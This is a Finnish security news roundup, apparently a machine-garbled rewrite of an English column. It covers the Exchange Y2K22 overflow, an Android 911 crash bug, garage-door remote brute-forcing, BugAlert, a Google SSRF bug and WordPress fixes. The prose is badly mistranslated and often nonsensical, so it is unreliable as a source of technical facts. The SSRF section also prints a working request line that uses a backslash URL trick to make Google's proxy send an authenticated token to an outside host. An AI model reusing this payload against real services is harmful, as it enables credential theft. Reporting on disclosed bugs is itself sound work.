Jos oli epäonnea käynnissä Microsoft Exchange Server viime viikolla, niin et vaatimus minun kertoa Y2K22 ongelma . Kiinni loput meitä, kun vaihto yrittänyt ladata ensimmäinen haittaohjelma määritelmien päivitys 2022, versionumero uusien määritelmien laukaisi onnettomuus haittaohjelmien tunnistus moottori. Päivämäärä on edustettuina merkkijono 2201010001, jossa ensimmäinen ja toinen numero tarkoittavat vuotta. Tämä merkkijono saa muuntaa allekirjoitettu pitkä kokonaisluku, joka maxes ulos 2147483647. Kokonaisluku ylivuotoja sekä ratkaisu on määrittämätön käyttäytyminen, kaatuu moottori. Palvelin lakkaa toimimasta turvallinen, ei käsittele minkäänlaisia viestejä ilman toimivaa haittaohjelmia moottori, mikä tarkoittaa, ettei sähköpostin perille. tyytyväinen uutta vuotta!
Android 911 Palvelunesto
Soittamalla 911 Pelastuspalvelujen on melko paljon pahinta aikaa ohjelmistosovelluksen vian ilmenevän. Google vain kiinteitä tällaisen vian tammikuussa Android päivityksen. Se on yksi niistä outo tahaton app vuorovaikutukset – Tässä tilanteessa Microsoft joukkueet käynnistävät Android vika. Jos joukkueet sovellus on asennettu, mutta ei missään kirjautunut sisään, tiimit tuottaa sekä rekisterit uuden puhelintili kohtana joka käynnistää. Tämä tuntuu sen pitäisi olla harvinaisia, mutta joukkueet Android on niin ikään kuuluisa kirjautumassa ulos yksittäisiä spontaanisti. Kun soitat 911, Android juoksee rutiinia mitkä puhelintili pitäisi käyttää polkua puhelu sekä ratkaisee siteet vertaamalla hash. Tämä vertailu on vain naiivi vähennys-, mikä merkitsee, että siellä on 50% mahdollisuus saamaan epäsuotuisa tulos. Tämä oli odottamattomia, mikä kaatua.
Autotallin ovi käänteistekniikkaa
Reverse engineering 30-vuotias langaton lupaa suunnitelma ei ehkä eniten kiinnostusta herättäviä feat, mutta joissakin tapauksissa matka on oma palkita. [Maxwell Dulin] tuo meille tarina, sekä tämä matka on ehdottomasti sen arvoista. Perusasiat Tämän hakata ovat varmasti vielä elinkelpoisia alkaen vilkaisemalla laitteisto. Autotallin ovi on synkronoitu autotallin oven avaaja pitämällä näppäintä vastaanottimen lähetettäessä koodin. sisällä avaaja, on yhdeksän DIP-kytkimet, joissa kussakin on kolme asentoa. Mitä he tekevät? Hän veti luotettava SDR saada verkkoliikenne sekä yrittää purkaa signaaleja. Inspectrum sekä GNU Radio olivat sankareita täällä, perehdyttäisi näin helppoa auth järjestelmän. Lopullinen ajatuksia tämä todellinen autotallin ovi? Voit brute force tuntemattoman koodin lähettämällä kaikin mahdollisin combo, sekä se kestää vain 104 minuuttia.
BugAlert
Jos olet sysadmin, ymmärrät, että joissakin asioissa puhelun soittamista, välitöntä toimintaa. Jos juoksi Java palvelimissa log4j haavoittuvuus oli lopettaa testaa reaktion protokollaa. välinen aika julkistamista sekä aina kuullut siitä, ehkä ollut riittävästi lähteä katastrofi. Vaikka on olemassa useita Virheraportointi palvelut sekä puitteet, ei mitään melko sopii tähän markkinarako hyödyntää tapauksessa: ilmoittaa niin pian kuin mahdollista, että hiukset voi todella olla tulessa. Että täyttämättömät kapealla salakuunnella [Matt Sullivan], joka on paljastanut uuden projektin, Bug Alert. Se kaikki avoimen lähdekoodin, joten voit pitää oman esimerkiksi jos todella haluat. Voit valita saada piipittää, tekstiä, tai jopa puhelimitse. Tämä on mahdollinen olla hyödyllinen työkalu, katsomaan!
Minusta tuntuu vaatimus merkitsee Bug Alert lähti erityinen outo Al laulu …
Zombie SSRF
[David Schütz] oli etsimässä hämäriä Google API, samoin kuin löytyi jobs.googleapis.com, jonka voit demo itse. Että demo on mielenkiintoinen, koska se ei ole täysin konkreettisempi-out palvelu, mutta puhuu kuin aito back-end. Pyynnöt menevät välityspalvelimen, cxl-services.appspot.com, joka käsittelee autentikointi askel esittelysivu. Jos hän voisi kuitata palvelinpuolen pyyntö väärennys (SSRF), hän saattaa pystyä saada aikaa todennettu pyynnöstä, sekä kenties tekniikka välityspalvelimen osaksi lähettävän verkkoliikenne hänen puolestaan. URL-jäsennys on kova. Tekniikka, joka toimi? Kenoviiva url. get /proxy?url=https://sfmnev.vps.xdavidhu.me\@jobs.googleapis.com/ HTTP / 1.1
Joiden Päästä symbolinen kädessä, [David] alkoi perusteellisesti tarkkailun muiden Googlen API nähdä, mitä tämä tunnus toimittanut hänelle päästä on. Hän antaa kuitenkin varoituksista olemme käsitelleet ennen, olla varovainen tarkalleen miten pitkälle työntää. Hän olisi voinut raportoitu bugin paras pois, halusi kuitenkin varmistaa, että hän todella oli verkossa Päästä symboliset. Kun olet vahvistanut merkki auttoivat tarkistanut pois, hän kääntyi siihen toteamukseen, sekä tasautettava erittäin hyvä $ +3133,70 lisäksi ylimääräinen $ 1000 suuren kertomuksen sekä varovainen katsomaan sivuttaisliike. Siinä kaikki siellä on se, eikö? Ei. juuri ennen 90 päivän määräaika on kulunut, [David] löytänyt korjaus ohitus. lisäNG minkäänlaista tekstiä selkänojan ja @ välillä oli riittävä rikkomaan sitä. Yksi $ 3133.70. Vain hauskaa, hän toisti vanhoja URL-osoitteita, jotka eivät saisi olla käytössä korjauksen jälkeen. Jep, hän löysi vielä yhden turvallisuuden ja turvallisuuden tunnuksen sekä nettoidun 3133,70 dollaria. Tämä zombie SSRF ei ole vielä kuollut, kuten Twitterissä todistetaan:
WordPress-päivitys
Jos et ole asettanut WordPress-ilmiötä päivittää automaattisesti, on aika mennä tarkastaa viimeisimmän version. Täällä on neljä mahdollisesti haitallista ongelmaa, vaikka yksityiskohdat ovat vähäisiä tässä vaiheessa. Erittäin ensimmäinen ylöspäin on ristikkäisen komentosarjan haavoittuvuus julkaisussa Slugs, osan URL-osan, joka vastaa julkaisua nimeä. Toinen käsitelty ongelma on kohteen injektio eräissä multisete-konfiguraatioissa. Viimeiset kaksi haavoittuvuutta ovat SQL-injektiot, varmasti ansaitsevat “mitä vuosi on?” Meme.